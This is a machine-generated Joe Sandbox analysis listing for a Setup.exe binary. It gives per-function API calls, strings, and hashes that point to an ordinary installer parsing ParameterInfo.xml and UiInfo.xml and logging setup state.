                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                              • String ID: CompressedDownloadSize$CompressedHashValue$DownloadSize$HashValue$ParameterInfo.xml$URL$schema validation failure: If HashValue is present then it must be a 64 hex-digit string$schema validation failure: If URL is present then there must be a DownloadSize
                                                              • API String ID: 24280941-3047338099
                                                              • Opcode ID: c95fba14325038a65df29e30ef44901576e8e4829f1d40efdce6e657eda07617
                                                              • Instruction ID: 1cb38f41271b13dc88d8b035b41dbbdd3c9d9263576d0d9b35a472de1062c13c
                                                              • Opcode Fuzzy Hash: c95fba14325038a65df29e30ef44901576e8e4829f1d40efdce6e657eda07617
                                                              • Instruction Fuzzy Hash: CFA17371904249DFCB14CFA8C944AEEBBF9AF25318F148559F065E7B80C734EA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C956789
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C95988C: __EH_prolog3.LIBCMT ref: 6C959893
                                                                • Part of subcall function 6C95988C: GetCommandLineW.KERNEL32(0000002C,6C95D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9598B4
                                                                • Part of subcall function 6C95988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C95996E
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • CoInitialize.OLE32(00000000), ref: 6C9567DD
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,6C94FA6E,?,?,?,UiInfo.xml,?,00000000,00000044,6C9536D8,02642228,?,00000000), ref: 6C9567FB
                                                              • __CxxThrowException@8.LIBCMT ref: 6C956A24
                                                              • CoUninitialize.OLE32(?,6C98BE00,?,?,?,UiInfo.xml,?,00000000,00000044,6C9536D8,02642228,?,00000000,?), ref: 6C956A3A
                                                              • SysFreeString.OLEAUT32(?), ref: 6C956A43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8PathRelativeThrow$CommandCreateFileFreeInitializeInstanceLineModuleNameStringUninitialize
                                                              • String ID: LCIDHints$ParameterInfo.xml$UiInfo.xml$Xml Document load failure
                                                              • API String ID: 2432735026-2443555527
                                                              • Opcode ID: 46136bef60c7fb05b644ce2f3969b4ca2fafff385bacc8d1177c6e369ddd6a2e
                                                              • Instruction ID: 7ca137ae1c833847d1277170e1b059f823e3c351ea627adb24df22090175fd27
                                                              • Opcode Fuzzy Hash: 46136bef60c7fb05b644ce2f3969b4ca2fafff385bacc8d1177c6e369ddd6a2e
                                                              • Instruction Fuzzy Hash: 60918371900148EFCB05DFE8C984AEDBBB9AF69308F248589E115EBB41D735DE05CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C919F3B
                                                              • VariantInit.OLEAUT32(00000003), ref: 6C919F49
                                                              • SysFreeString.OLEAUT32(?), ref: 6C919F83
                                                                • Part of subcall function 6C95964C: __get_errno.LIBCMT ref: 6C95966C
                                                                • Part of subcall function 6C95964C: __wcstoui64.LIBCMT ref: 6C95968F
                                                                • Part of subcall function 6C95964C: __get_errno.LIBCMT ref: 6C9596A1
                                                              • __ui64tow_s.LIBCMT ref: 6C919FEF
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91A0BC
                                                              • SysAllocString.OLEAUT32(00000000), ref: 6C91A0C2
                                                              • VariantClear.OLEAUT32(?), ref: 6C91A0E9
                                                              Strings
                                                              • schema validation failure: %s is invalid, a non-negitive numeric value is required for %s, xrefs: 6C91A03C
                                                              • Name, xrefs: 6C91A121
                                                              • schema validation failure: attribute %s missing for %s %s, xrefs: 6C91A17B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: StringVariant__get_errno$AllocClearException@8FreeH_prolog3InitThrow__ui64tow_s__wcstoui64
                                                              • String ID: Name$schema validation failure: %s is invalid, a non-negitive numeric value is required for %s$schema validation failure: attribute %s missing for %s %s
                                                              • API String ID: 1723289333-1070666262
                                                              • Opcode ID: beae88ed2454df69f4592ece6065dff5d0b9d7b17c60a0ab613a26e25bc1679b
                                                              • Instruction ID: e56ec13a50473345da5c8f08901def9ad47c8e756e626933365a4fd71d1704dd
                                                              • Opcode Fuzzy Hash: beae88ed2454df69f4592ece6065dff5d0b9d7b17c60a0ab613a26e25bc1679b
                                                              • Instruction Fuzzy Hash: FA91AD71904249EFDF01CFA4C944ADEBBB9BF29318F184559E411EBB81DB30DA08CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                              • GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • SetFilePointer.KERNEL32(?,00000000,6C90A794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 6C91AA49
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91AA97
                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C91AAAC
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91AB2C
                                                              Strings
                                                              • Could not find mandatory data file %s. This is a bad package., xrefs: 6C91AAE5
                                                              • ReadXML failed to open XML file %s, with error %d, xrefs: 6C91AA07
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3$AllocChangeCloseException@8FindModuleNameNotificationPathPointerReadRelativeStringThrow
                                                              • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                              • API String ID: 956789720-4172873023
                                                              • Opcode ID: 7759b2bd2336004e1642b97f713ab6c7a2766ef8ef49a43f64d46839b2723f42
                                                              • Instruction ID: e6db30aa1650404a37fbabfbac8dede156c6ebe05665acb99da8d3a69bdcbaec
                                                              • Opcode Fuzzy Hash: 7759b2bd2336004e1642b97f713ab6c7a2766ef8ef49a43f64d46839b2723f42
                                                              • Instruction Fuzzy Hash: 63816971904209EFDF00DFA4C8859EEBBBABF19318F14451AE510B7B90CB34DA19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4931A7
                                                                • Part of subcall function 6C48D76F: __EH_prolog3.LIBCMT ref: 6C48D776
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • _wcschr.LIBCMT ref: 6C4931E8
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4932A2
                                                                • Part of subcall function 6C4ADBDB: RaiseException.KERNEL32(?,?,6C4A9236,?,?,?,?,?,6C4A9236,?,6C4B7F54,6C4C22B4), ref: 6C4ADC1D
                                                              • PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,6C4A6F33,?,?,00000000,00000044,6C4A668B,?,00000000,00000000,?,?,succeeded), ref: 6C4932B9
                                                              • PathFileExistsW.SHLWAPI(00000000,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C4932C6
                                                              • PathFileExistsW.SHLWAPI(?,00000000,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 6C493307
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C49330A
                                                                • Part of subcall function 6C48CA39: __EH_prolog3.LIBCMT ref: 6C48CA40
                                                                • Part of subcall function 6C48CAC2: __EH_prolog3.LIBCMT ref: 6C48CAC9
                                                                • Part of subcall function 6C48D170: __EH_prolog3.LIBCMT ref: 6C48D177
                                                              Strings
                                                              • Successfuly found file %s , xrefs: 6C493341
                                                              • UIInfo.xml, xrefs: 6C493234
                                                              • UiInfo.xml has INVALID ResourceDLLName %s, xrefs: 6C493222
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Path$ExistsFile$ExceptionException@8RaiseRelativeThrow_wcschr
                                                              • String ID: Successfuly found file %s $UIInfo.xml$UiInfo.xml has INVALID ResourceDLLName %s
                                                              • API String ID: 1926448744-2896109536
                                                              • Opcode ID: 2be98c070d8d58e8d0e36fec99b890407ef6881b147a54800f49caddf787c8b5
                                                              • Instruction ID: 3b1c313fa1ef5a9b6bab3f0c696ebcae71aca5c0ad6dfd348ad0c8b864a043e7
                                                              • Opcode Fuzzy Hash: 2be98c070d8d58e8d0e36fec99b890407ef6881b147a54800f49caddf787c8b5
                                                              • Instruction Fuzzy Hash: E5715A71901259EFDB00DBE8C984EDEBBB8BF15318F14455AE414B7781DB34EA09CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C94A796
                                                                • Part of subcall function 6C91C5D4: __EH_prolog3.LIBCMT ref: 6C91C5DB
                                                                • Part of subcall function 6C91C5D4: GetLastError.KERNEL32 ref: 6C91C609
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C951236: __EH_prolog3.LIBCMT ref: 6C95123D
                                                              • GetLastError.KERNEL32 ref: 6C94A83B
                                                              • GetLastError.KERNEL32 ref: 6C94A8F4
                                                              • GetLastError.KERNEL32 ref: 6C94A95B
                                                              Strings
                                                              • Failed to record IsRetailBuild, xrefs: 6C94A975
                                                              • Failed to record PatchType, xrefs: 6C94A90E
                                                              • Failed to record InstallerVersion, xrefs: 6C94A8B0
                                                              • Failed to record PackageName, xrefs: 6C94A7B8
                                                              • Failed to record PackageVersion, xrefs: 6C94A7F7
                                                              • Failed to record DisplayedLcidId, xrefs: 6C94A855
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last
                                                              • String ID: Failed to record DisplayedLcidId$Failed to record InstallerVersion$Failed to record IsRetailBuild$Failed to record PackageName$Failed to record PackageVersion$Failed to record PatchType
                                                              • API String ID: 685212868-335235891
                                                              • Opcode ID: 893c1f7538201e616aa1acedb37c34dfb60e03080316e1dfd3d9d5b831d23cd9
                                                              • Instruction ID: f056c18a726afea679d1d3997e47e387643531eff37912dd74d71a9997ec17b8
                                                              • Opcode Fuzzy Hash: 893c1f7538201e616aa1acedb37c34dfb60e03080316e1dfd3d9d5b831d23cd9
                                                              • Instruction Fuzzy Hash: 57517172600209AFDB10DFA5C904ACA3BBABFA5358F108528F914DBB90CB70D615CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95007D
                                                              • GetSystemInfo.KERNEL32(?,02642228,02642228,02642228,02642228,00000050,6C9493A7,?,UserControlled,?,02642228,6C90A794,?,6C91BFC7,00000018,6C91BC3C), ref: 6C95010B
                                                              • SqmIsWindowsOptedIn.SQMAPI(?,UserControlled,?,02642228,6C90A794,?,6C91BFC7,00000018,6C91BC3C,0264224C,?,?,?,?,?,?), ref: 6C950121
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9501CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3InfoOptedSystemThrowWindows
                                                              • String ID: AlwaysUploaded$Disabled$OSControlled$ParameterInfo.xml$UserControlled$schema validation failure: Invalid Policy Value being defined.
                                                              • API String ID: 3692811390-1543467451
                                                              • Opcode ID: 3bb2760e8890fa4b472c0812bcbf212563fc91b14441571cabb86073cd85e931
                                                              • Instruction ID: 4adc0a245415f77316c8e59622f31498987ca08d766783ba5c1bbbc3d0c047ed
                                                              • Opcode Fuzzy Hash: 3bb2760e8890fa4b472c0812bcbf212563fc91b14441571cabb86073cd85e931
                                                              • Instruction Fuzzy Hash: 5E41B032904249DFCB14CBB8C851BDEB7B9AF2531CF444259E425EBA81DB30DA58C7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C91C53D: GetLastError.KERNEL32(?,6C94A320,512AC3CC,?,?), ref: 6C91C55E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C951236: __EH_prolog3.LIBCMT ref: 6C95123D
                                                              • GetLastError.KERNEL32 ref: 6C94A393
                                                              • GetLastError.KERNEL32 ref: 6C94A434
                                                              • GetLastError.KERNEL32 ref: 6C94A4A7
                                                              • GetLastError.KERNEL32 ref: 6C94A511
                                                              • GetLastError.KERNEL32 ref: 6C94A5A5
                                                              Strings
                                                              • Failed to record SetMachineId, xrefs: 6C94A461
                                                              • Failed to record StartupAppid, xrefs: 6C94A4C1
                                                              • Failed to record current state name, xrefs: 6C94A52B
                                                              • Failed to record MPC, xrefs: 6C94A5BB
                                                              • Failed to record StartSession, xrefs: 6C94A322
                                                              • Failed to record SetUserId, xrefs: 6C94A3C0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$H_prolog3
                                                              • String ID: Failed to record MPC$Failed to record SetMachineId$Failed to record SetUserId$Failed to record StartSession$Failed to record StartupAppid$Failed to record current state name
                                                              • API String ID: 3502553090-2804495384
                                                              • Opcode ID: 6bff5bc9b6651ee5f4f81a6a379811538b463a9a9ec8b09c3b7e9143437f5c63
                                                              • Instruction ID: 823a59a1d9c4aceb0239b760e63c557bcf67450dcd8b76e0e4d67caa1d6d5bd4
                                                              • Opcode Fuzzy Hash: 6bff5bc9b6651ee5f4f81a6a379811538b463a9a9ec8b09c3b7e9143437f5c63
                                                              • Instruction Fuzzy Hash: FAA1A1712082429FD724CF65C844A9F7BE9FFA5368F104A2DF461C7AA1DB74D908CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C93212E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C932484
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: CopyPackageFilesToDownloadLocation$DelayBetweenRetries$DownloadRetries$Items$No items found. The package must contain at least one item.$ParameterInfo.xml$true
                                                              • API String ID: 2489616738-2573507987
                                                              • Opcode ID: bcd00543d3d3a316ee565c9d8546d49a3a78f1ead21a13066430499c0d155afe
                                                              • Instruction ID: b775fcad42d54b3085cdab72e703710dcf88affa71e5b3416c5c496f2f97a8bd
                                                              • Opcode Fuzzy Hash: bcd00543d3d3a316ee565c9d8546d49a3a78f1ead21a13066430499c0d155afe
                                                              • Instruction Fuzzy Hash: F9D15170904259DFCF05CFA8C984AEEBBB9BF59308F148199E414EBB81C734DA05CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 6C623302
                                                                • Part of subcall function 6C623679: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C62332F,?), ref: 6C623683
                                                                • Part of subcall function 6C623679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C62332F,?), ref: 6C6236B3
                                                                • Part of subcall function 6C623679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C6236D5
                                                                • Part of subcall function 6C623679: FindCloseChangeNotification.KERNEL32(?,?,00000001,?,?,?,?,6C62332F,?), ref: 6C6236E0
                                                              • EnterCriticalSection.KERNEL32(6C640168,?), ref: 6C623334
                                                              • LeaveCriticalSection.KERNEL32(6C640168,00000400,?), ref: 6C6233F5
                                                              • LocalFree.KERNEL32(00000000), ref: 6C62340C
                                                              • SetLastError.KERNEL32(00000057), ref: 6C62341F
                                                                • Part of subcall function 6C6217EB: malloc.MSVCRT ref: 6C6217F6
                                                              • ctype.LIBCPMT ref: 6C62EDDC
                                                                • Part of subcall function 6C62343E: GetSystemTime.KERNEL32(00000000,00000838,00000000), ref: 6C62347D
                                                                • Part of subcall function 6C62343E: SystemTimeToFileTime.KERNEL32(00000000,00000000), ref: 6C62348B
                                                                • Part of subcall function 6C6230D2: InterlockedIncrement.KERNEL32(00000000), ref: 6C6230D8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Time$CriticalProcessSectionSystem$ChangeCloseConvertCurrentEnterErrorFileFindFreeIncrementInterlockedLastLeaveLocalNotificationOpenStringTokenctypemallocmemset
                                                              • String ID: %s_%s$W
                                                              • API String ID: 1092980461-4070589124
                                                              • Opcode ID: 13b173f4bf0f9c2f039d2999e54be4e114c9c35bddabd93f60738ac9faf8ec7c
                                                              • Instruction ID: fd55c8f032ede8656e1e3107f3a0071ee8f79e14321923b3e7f27922a7d5e090
                                                              • Opcode Fuzzy Hash: 13b173f4bf0f9c2f039d2999e54be4e114c9c35bddabd93f60738ac9faf8ec7c
                                                              • Instruction Fuzzy Hash: C4C1D5319402689BDB619F25CC80BD977F8BF01749F10C4A4E999A7991CB79CA88CFDC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • CustomErrorHandling, xrefs: 6C923BFA
                                                              • ReturnCode, xrefs: 6C923CCA
                                                              • MSIErrorMessage, xrefs: 6C923D0D
                                                              • ParameterInfo.xml, xrefs: 6C923C67
                                                              • Adding Custom Code , xrefs: 6C923E02
                                                              • CustomErrorHandling element not defined, xrefs: 6C923BE1
                                                              • Processing CustomErrorHandling element block, xrefs: 6C923BF0
                                                              • schema validation failure: Expect at least one CustomError element., xrefs: 6C923C59
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Adding Custom Code $CustomErrorHandling$CustomErrorHandling element not defined$MSIErrorMessage$ParameterInfo.xml$Processing CustomErrorHandling element block$ReturnCode$schema validation failure: Expect at least one CustomError element.
                                                              • API String ID: 431132790-2299275001
                                                              • Opcode ID: 8cbf2dee28b8b8055498cca5814bb7c5a1e6d19bcaa9414498c6e113fd1b359f
                                                              • Instruction ID: 1f274bd3cfe28f83be61cacf085c15ec4853048e71143af20898909814deb4da
                                                              • Opcode Fuzzy Hash: 8cbf2dee28b8b8055498cca5814bb7c5a1e6d19bcaa9414498c6e113fd1b359f
                                                              • Instruction Fuzzy Hash: 63B15771910249EFDB04CBB8C945BEEBBB8BF25318F144649E160ABB80D734DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C947B4A
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • GetCommandLineW.KERNEL32 ref: 6C947BB4
                                                              • _memset.LIBCMT ref: 6C947BF4
                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 6C947C03
                                                              • GetThreadLocale.KERNEL32(00000007,?), ref: 6C947C3F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CommandH_prolog3H_prolog3_InformationLineLocaleThreadTimeZone_memset
                                                              • String ID: CommandLine = %s$Environment details$Initial LCID = %u$TimeZone = %s
                                                              • API String ID: 1050886296-4009495903
                                                              • Opcode ID: 6f20c99fe89cc406d6c028af6dff3aefc06fa2713484d0846bd47623f475b1e2
                                                              • Instruction ID: 17735bf812bbd62984827bc45d7de5a4550906762ccf98d8b9d53cdd48ee96a9
                                                              • Opcode Fuzzy Hash: 6f20c99fe89cc406d6c028af6dff3aefc06fa2713484d0846bd47623f475b1e2
                                                              • Instruction Fuzzy Hash: 0D315C71901218EBEB20DBA4CC48FCDBBB9BF15309F14459AE108E7A90DB30DA48CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C938DC6
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • PathIsRelativeW.SHLWAPI(?,?,?,00000024,6C962414), ref: 6C938DE4
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C938E1F
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
